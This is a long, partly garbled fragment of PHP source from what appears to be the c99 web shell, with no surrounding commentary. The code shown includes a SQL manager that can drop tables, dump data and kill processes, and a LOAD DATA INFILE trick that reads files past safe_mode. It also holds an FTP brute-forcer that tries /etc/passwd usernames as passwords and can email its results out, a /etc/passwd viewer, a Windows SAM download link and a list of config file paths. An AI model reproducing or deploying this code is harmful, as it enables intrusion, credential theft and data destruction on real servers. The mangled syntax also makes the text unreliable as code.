    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of
process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td
width=\"90%\" height=1 valign=\"top\">";
    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b></td></tr>
<tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr>
<form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\">
<tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td>
<input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input
type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b>
</td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\"
value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\"
value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\">
</td></tr><tr><td></td></tr></form></table></td>";
}
else {
    //Start left panel
    if (!empty($sql_db)) {
        ?><td width="25%" height="100%" valign="top"><a
href="act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql
_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_p
ort)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
        <?php
        $result = mysql_list_tables($sql_db);
        if (!$result) {echo mysql_error();}
        else {
            echo "---[ <a href=\"\". $sql_surl."&\"><b>\".htmlspecialchars($sql_db)."</b></a> ]---<br>";
            $c = 0;
            while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*)
FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a
href=\"\". $sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."
"><b>\".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>";
mysql_free_result($count); $c++;}
            if (!$c) {echo "No tables found in database.";}
        }
    }
    else {
        ?><td width="1" height="100" valign="top"><a href=""><b>Home</b></a><hr size="1"

```

noshade>

```
<?php
$result = mysql_list_dbs($sql_sock);
if (!$result) {echo mysql_error();}
else {
    ?><form action="<?php echo $url; ?>"><input type="hidden" name="act" value="sql">
<input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
<input type="hidden" name="sql_passwd" value="<?php echo
htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php
echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php
echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
    <?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0].\"\""; if
($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (\".$c.)</option>";
    echo $dbs;
}
?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input
type="submit" value="Go"></form>
<?php
}
//End left panel
echo "</td><td width=\"100%\">";
//Start center panel
$display = TRUE;
if ($sql_db) {
    if (!is_numeric($c)) {$c = 0;}
    if ($c == 0) {$c = "no";}
    echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB
(\".htmlspecialchars($sql_db).").<br>";
    if (count($dbquicklaunch) > 0) {foreach($dbquicklaunch as $item) {echo "[ <a
href=\"".$item[1].\">".$item[0]."</a> ] ";}}
    echo "</b></center>";
    $acts = array("", "dump");
    if ($sql_act == "tbl_drop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v)
{$sql_query .= "\n".$v." ";} $sql_query = substr($sql_query, 0, -1).";"; $sql_act = "query";}
    elseif ($sql_act == "tbl_empty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .=
```

```

"DELETE FROM `".$v."` \n";} $sql_act = "query";}
elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl)
{$dmptbls = array($sql_tbl);} $sql_act = "dump";}
elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v)
{$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v)
{$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v)
{$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v)
{$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query =
"DELETE * FROM `".$sql_tbl."`";} else {foreach($boxrow as $v) {$sql_query .= "DELETE *
FROM `".$sql_tbl."` WHERE ".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act
= "query";}
elseif ($sql_tbl_act == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {$keys .= "".addslashes($v)."" , ";}
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct =
$sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." ("; $values .= "".addslashes($v).""; if
($funct) {$values .= ")";} $values .= " , "; $i++;}
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_act = "query";
$sql_tbl_act = "browse";
}
elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert," ,",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT
1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_act = "query";
$sql_tbl_act = "browse";
}
}

```

```

}
}
if ($sql_act == "query") {
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error)
{$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr>
<td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit))
{echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea
name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br>
<br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\"
name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\"
name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\"
value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\"
value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
    }
    if (in_array($sql_act,$acts)) {
        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1">
<b>Create new table:</b>
        <form action="<?php echo $surl; ?>">
        <input type="hidden" name="act" value="sql">
        <input type="hidden" name="sql_act" value="newtbl">
        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?
>">
        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);
?>">
        <input type="hidden" name="sql_passwd" value="<?php echo
htmlspecialchars($sql_passwd); ?>">
        <input type="hidden" name="sql_server" value="<?php echo
htmlspecialchars($sql_server); ?>">
        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?
>">
        <input type="text" name="sql_newtbl" size="20">
        <input type="submit" value="Create">
        </form></td>
        <td width="30%" height="1"><b>Dump DB:</b>
        <form action="<?php echo $surl; ?>">
        <input type="hidden" name="act" value="sql">

```

```


```



```

}
elseif ($sql_dump_savetofile) {
    $fp = fopen($sql_dump_file,"w");
    if (!$fp) {echo "<b>Dump error! Can't write to
\"".htmlspecialchars($sql_dump_file)."\"";}
    else {
        fwrite($fp,$ret);
        fclose($fp);
        echo "<b>Dumped! Dump has been written to
\"".htmlspecialchars(realpath($sql_dump_file)).\" (" .view_size(filesize($sql_dump_file)).")
</b>.";
    }
}
else {echo "<b>Dump: nothing to do!</b>";}
}
}
if ($display) {
if (!empty($sql_tbl)) {
    if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
    $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`");
    $count_row = mysql_fetch_array($count);
    mysql_free_result($count);
    $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`");
    $tbl_struct_fields = array();
    while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
    if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
    if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
    if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
    if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
    $perpage = $sql_tbl_le - $sql_tbl_ls;
    if (!is_numeric($perpage)) {$perpage = 10;}
    $numpages = $count_row[0]/$perpage;
    $e = explode(" ",$sql_order);
    if (count($e) == 2) {
        if ($e[0] == "d") {$asc_desc = "DESC";}
        else {$asc_desc = "ASC";}
        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
    }
    else {$v = "";}
}
}

```



```

<option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option>
<option>FROM_UNIXTIME</option><option>PERIOD_ADD</option>
<option>PERIOD_DIFF</option><option>TO_DAYS</option>
<option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option>
<option>CONCAT</option></select></td><td><input type=\"text\"
name=\"sql_tbl_insert[\".htmlspecialchars($name).\"]\"
value=\"\".htmlspecialchars($values[$name]).\"\" size=50></td></tr>";
    $i++;
}
echo "</table><br>";
echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\"\"; if
(empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\"
name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input
type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"\".htmlspecialchars($sql_tbl_insert_q).\"\">";}
echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
}
}
if ($sql_tbl_act == "browse") {
    $sql_tbl_ls = abs($sql_tbl_ls);
    $sql_tbl_le = abs($sql_tbl_le);
    echo "<hr size=\"1\" noshade>";
    echo "<img src=\"\".$surl.\"act=img&img=multipage\" height=\"12\" width=\"10\"
alt=\"Pages\">&nbsp;";
    $b = 0;
    for($i=0;$i<$numpages;$i++) {
        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a
href=\"\".$sql_surl.\"sql_tbl=\".urlencode($sql_tbl).\"&sql_order=\".htmlspecialchars($sql_order).\"&
sql_tbl_ls=\".($i*$perpage).\"&sql_tbl_le=\".($i*$perpage+$perpage).\"\"><u>";}
        echo $i;
        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u>
</a>";}
        if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
        else {echo "&nbsp;";}
    }
    if ($i == 0) {echo "empty";}
    echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input
type=\"hidden\" name=\"sql_db\" value=\"\".htmlspecialchars($sql_db).\"\"><input
type=\"hidden\" name=\"sql_login\" value=\"\".htmlspecialchars($sql_login).\"\"><input

```

```

type="hidden" name="sql_passwd" value="".htmlspecialchars($sql_passwd)."\"><input
type="hidden" name="sql_server" value="".htmlspecialchars($sql_server)."\"><input
type="hidden" name="sql_port" value="".htmlspecialchars($sql_port)."\"><input
type="hidden" name="sql_tbl" value="".htmlspecialchars($sql_tbl)."\"><input
type="hidden" name="sql_order" value="".htmlspecialchars($sql_order)."\"><b>From:
</b>&nbsp;<input type="text" name="sql_tbl_ls" value="".$sql_tbl_ls.""\&nbsp;<b>To:
</b>&nbsp;<input type="text" name="sql_tbl_le" value="".$sql_tbl_le.""\&nbsp;<input
type="submit" value="View"\"></form>";

```

```

echo "<br><form method="POST"><TABLE cellSpacing=0 borderColorDark=#666666
cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";

```

```

echo "<tr>";

```

```

echo "<td><input type="checkbox" name="boxrow_all" value="1"\></td>";

```

```

for ($i=0;$i<mysql_num_fields($result);$i++) {

```

```

    $v = mysql_field_name($result,$i);

```

```

    if ($e[0] == "a") {$s = "d"; $m = "asc";}

```

```

    else {$s = "a"; $m = "desc";}

```

```

    echo "<td>";

```

```

    if (empty($e[0])) {$e[0] = "a";}

```

```

    if ($e[1] != $v) {echo "<a

```

```

href="".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql
_order=".$e[0]."%20".$v.""\><b>".$v."</b></a>";}

```

```

    else {echo "<b>".$v."</b><a

```

```

href="".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql
_order=".$s."%20".$v.""\><img src="".$surl."act=img&img=sort_".$m."\" height="9"

```

```

width="14" alt="".$m.""\></a>";}

```

```

    echo "</td>";

```

```

}

```

```

echo "<td><font color="green"><b>Action</b></font></td>";

```

```

echo "</tr>";

```

```

while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {

```

```

    echo "<tr>";

```

```

    $w = "";

```

```

    $i = 0;

```

```

    foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " ".$name." =
"".addslashes($v)."" AND"; $i++;}

```

```

    if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}

```

```

    echo "<td><input type="checkbox" name="boxrow[]" value="".$w.""\></td>";

```

```

    $i = 0;

```

```

    foreach ($row as $k=>$v)

```

```

{
    $v = htmlspecialchars($v);
    if ($v == "") {$v = "<font color='green'>NULL</font>";}
    echo "<td>".$v."</td>";
    $i++;
}
echo "<td>";
echo "<a
href='\"".$sql_url."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql
_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl." WHERE ".$w."
LIMIT 1;")."\"><img src='\"".$url."act=img&img=sql_button_drop" alt='\"Delete\" height='\"13\"
width='\"11\" border='\"0\"></a>&nbsp;";
    echo "<a
href='\"".$sql_url."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."
&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img
src='\"".$url."act=img&img=change" alt='\"Edit\" height='\"14\" width='\"14\" border='\"0\">
</a>&nbsp;";
    echo "</td>";
    echo "</tr>";
}
mysql_free_result($result);
echo "</table><hr size='\"1\" noshade><p align='\"left\"><img
src='\"".$url."act=img&img=arrow_ltr" border='\"0\"><select name='\"sql_act\">";
    echo "<option value='\"'>With selected:</option>";
    echo "<option value='\"deleterow\">Delete</option>";
    echo "</select>&nbsp;<input type='\"submit\" value='\"Confirm\"></form></p>";
}
}
else {
    $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
    if (!$result) {echo mysql_error();}
    else
    {
        echo "<br><form method='\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666
cellPadding=5 width='\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr>
<td><input type='\"checkbox\" name='\"boxtbl_all\" value='\"1\"></td><td><center>
<b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td>
<b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b>
</td></tr>";
    }
}

```

```

$i = 0;
$size = $rows = 0;
while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
    $size += $row["Data_length"];
    $rows += $row["Rows"];
    $size = view_size($row["Data_length"]);
    echo "<tr>";
    echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
    echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\">
<b>".$row["Name"]."</b></a>&nbsp;</td>";
    echo "<td>".$row["Rows"]."</td>";
    echo "<td>".$row["Type"]."</td>";
    echo "<td>".$row["Create_time"]."</td>";
    echo "<td>".$row["Update_time"]."</td>";
    echo "<td>".$size."</td>";
    echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE
FROM `".$row["Name"]."")."\"><img src=\"".$surl."act=img&img=sql_button_empty\"
alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a
href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE
`".$row["Name"]."")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\"
height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a
href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img
src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\"
border=\"0\"></a>&nbsp;</td>";
    echo "</tr>";
    $i++;
}
echo "<tr bgcolor=\"000000\">";
echo "<td><center><b>+</b></center></td>";
echo "<td><center><b>".$i." table(s)</b></center></td>";
echo "<td><b>".$rows."</b></td>";
echo "<td>".$row[1]."</td>";
echo "<td>".$row[10]."</td>";
echo "<td>".$row[11]."</td>";
echo "<td><b>".view_size($size)."</b></td>";
echo "<td></td>";
echo "</tr>";
echo "</table><hr size=\"1\" noshade><p align=\"right\"><img

```



```

if ($sql_act == "newdb") {
    echo "<b>";
    if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
\"".htmlspecialchars($sql_newdb).\" has been created with success!</b><br>";}
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb).\".<br>Reason:</b>
".mysql_smarterror();}
}
if ($sql_act == "serverstatus") {
    $result = mysql_query("SHOW STATUS", $sql_sock);
    echo "<center><b>Server-status variables:</b><br><br>";
    echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333
border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td>
<td>".$row[1]."</td></tr>";}
    echo "</table></center>";
    mysql_free_result($result);
}
if ($sql_act == "servervars") {
    $result = mysql_query("SHOW VARIABLES", $sql_sock);
    echo "<center><b>Server variables:</b><br><br>";
    echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333
border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td>
<td>".$row[1]."</td></tr>";}
    echo "</table>";
    mysql_free_result($result);
}
if ($sql_act == "processes") {
    if (!empty($skill)) {
        $query = "KILL ".$skill.";";
        $result = mysql_query($query, $sql_sock);
        echo "<b>Process #".$skill." was killed.</b>";
    }
    $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
    echo "<center><b>Processes:</b><br><br>";
    echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td>
<b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td>
<b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b>
</td><td><b>Action</b></td></tr>";
}

```

```

while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td>
<td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td>
<td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a
href=\"\".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
echo "</table>";
mysql_free_result($result);
}
if ($sql_act == "getfile")
{
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created =
!!$select;}
if ($select)
{
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir`
LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE \"\".addslashes($sql_getfile).\"\" INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {echo "<b>Error in reading file (permission denied)!</b>";}
else
{
for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
$f = "";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\n",$row);}
if (empty($f)) {echo "<b>File \"\".$sql_getfile.\"\" does not exists or empty!</b><br>";}
else {echo "<b>File \"\".$sql_getfile.\"\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
mysql_free_result($result);
mysql_query("DROP TABLE tmp_file;");
}
}
mysql_drop_db($tmpdb); //comment it if you want to leave database
}
}
}
}
}
echo "</td></tr></table>";
if ($sql_sock) {

```

```

$affected = @mysql_affected_rows($sql_sock);
if ((!is_numeric($affected)) or ($affected < 0)){ $affected = 0;}
echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
}
echo "</table>";
}
//End of SQL Manager
if ($act == "ftpquickbrute") {
echo "<center><table><tr><td colspan=2>";
echo ".: Ftp Quick Brute :.</td></tr>";
echo "<tr><td>";
if ($win) {echo "Couldn't run on Windows!";}
else {
function c99ftpb Brutecheck($host,$port,$timeout,$login,$pass,$ssh,$fqb_onlywithsh) {
if ($fqb_onlywithsh) {$TRUE = (!in_array($ssh,array("/bin/FALSE","/sbin/nologin")));}
else {$TRUE = TRUE;}
if ($TRUE) {
$sock = @ftp_connect($host,$port,$timeout);
if (@ftp_login($sock,$login,$pass)) {
echo "<a href=\"ftp://".$login.":".$pass."@".$host.\" target=\"_blank\"><b>Connected to
".$host." with login \"".$login.\" and password \"".$pass.\"</b></a>.<br>";
ob_flush();
return TRUE;
}
}
}
if (!empty($submit)) {
if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
$fp = fopen("/etc/passwd","r");
if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
else {
if ($fqb_logging) {
if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
else {$fqb_logfp = FALSE;}
$fqb_log = "FTP Quick Brute (".$ssh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
}
ob_flush();
$i = $success = 0;
}
}
}

```

```

$ftpquick_st = getmicrotime();
while(!feof($fp)) {
    $str = explode(":",fgets($fp,2048));
    if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
        echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"\".$str[0].\"\" and
password \"\".$str[0].\"\"</b><br>";
        $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"\".$str[0].\"\" and
password \"\".$str[0].\"\", at ".date("d.m.Y H:i:s")."\r\n";
        if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
        $success++;
        ob_flush();
    }
    if ($i > $fqb_lenght) {break;}
    $i++;
}
if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success.
connections!\r\n";}
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
echo "<hr size='1' noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."
<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font>
<br>Unsuccess.: ".$i-$success."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."
<br>";
$fqb_log .= "\r\n-----\r\nDone!\r\nTotal time (secs.):
".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.: ".
($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
fclose($fqb_logfp);
}
}
else {
    $logfile = $tmpdir_logs."yx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
    echo "<form action='\".$surl.\"'><input type=hidden name=act value='\"ftpquickbrute'\">".
    "Read first:</td><td><input type=text name='\"fqb_lenght\""
value='\"".$nixpwdperpage.\"'></td></tr>".
    "<tr><td></td><td><input type='\"checkbox\"' name='\"fqb_onlywithsh\"' value='\"1\"'> Users
only with shell</td></tr>".
    "<tr><td></td><td><input type='\"checkbox\"' name='\"fqb_logging\"' value='\"1\""

```

```
checked>Logging</td></tr>".
```

```
    "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\"  
value=\"\".$logfile.\"\" size=\"\".(strlen($logfile)+2*(strlen($logfile)/10)).\"\"></td></tr>".
```

```
    "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\"  
value=\"\".$log_email.\"\" size=\"\".(strlen($logemail)+2*(strlen($logemail)/10)).\"\"></td></tr>".
```

```
    "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>;  
    }  
    echo "</td></tr></table></center>";
```

```
}
```

```
}
```

```
if ($act == "d") {
```

```
if (lis_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
```

```
else {
```

```
    echo "<b>Directory information:</b><table border=0 cellpadding=2>";
```

```
    if (!$win) {
```

```
        echo "<tr><td><b>Owner/Group</b></td><td> ";
```

```
        $ow = posix_getpwuid(fileowner($d));
```

```
        $gr = posix_getgrgid(filegroup($d));
```

```
        $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?
```

```
$gr["name"]:filegroup($d));
```

```
    }
```

```
    echo "<tr><td><b>Perms</b></td><td><a href=\"\".$surl."act=chmod&d=".urlencode($d).\"\">
```

```
<b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y
```

```
H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y
```

```
H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y
```

```
H:i:s",filemtime($d))."</td></tr></table>";
```

```
}
```

```
}
```

```
if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
```

```
if ($act == "security") {
```

```
    echo "<div>.: Server Security Information :.</div>".
```

```
    "<table>".
```

```
    "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
```

```
    echo "<td>Password File</td><td>";
```

```
    if (!$win) {
```

```
        if ($nixpasswd) {
```

```
            if ($nixpasswd == 1) {$nixpasswd = 0;}
```

```
            echo "*nix /etc/passwd:<br>";
```

```
            if (lis_numeric($nixpwd_s)) {$nixpwd_s = 0;}
```

```

if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
echo "<form action=\"\".$surl.\"\"><input type=hidden name=act value=\"security\"><input
type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text\"
name=\"nixpwd_s\" value=\"\".$nixpwd_s.\"\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\"
name=\"nixpwd_e\" value=\"\".$nixpwd_e.\"\">&nbsp;<input type=submit value=\"View\">
</form><br>";
$i = $nixpwd_s;
while ($i < $nixpwd_e) {
    $uid = posix_getpwuid($i);
    if ($uid) {
        $uid["dir"] = "<a href=\"\".$surl.\"act=ls&d=\".urlencode($uid["dir"]).\"\">\".$uid["dir"]."</a>";
        echo join(":",$uid)."<br>";
    }
    $i++;
}
}
else {echo "<a href=\"\".$surl.\"act=security&nixpasswd=1&d=\".$sud.\"\"><b><u>Get
/etc/passwd</u></b></a>";}
}
else {
    $v = $_SERVER["WINDIR"]."\repair\sam";
    if (file_get_contents($v)) {echo "<td colspan=2><div>You can't crack Windows
passwords(\".$v.\")</div></td></tr>"; }
    else {echo "You can crack Windows passwords. <a
href=\"\".$surl.\"act=f&f=sam&d=\".$_SERVER["WINDIR"]."\repair&ft=download\"><u>
<b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
}
echo "</td></tr>";
echo "<tr><td>Config Files</td><td>";
if (!$win) {
    $v = array(
        array("User Domains", "/etc/userdomains"),
        array("Cpanel Config", "/var/cpanel/accounting.log"),
        array("Apache Config", "/usr/local/apache/conf/httpd.conf"),
        array("Apache Config", "/etc/httpd.conf"),
        array("Syslog Config", "/etc/syslog.conf"),
        array("Message of The Day", "/etc/motd"),
        array("Hosts", "/etc/hosts")
    );
};

```

```

$sep = "/";
}
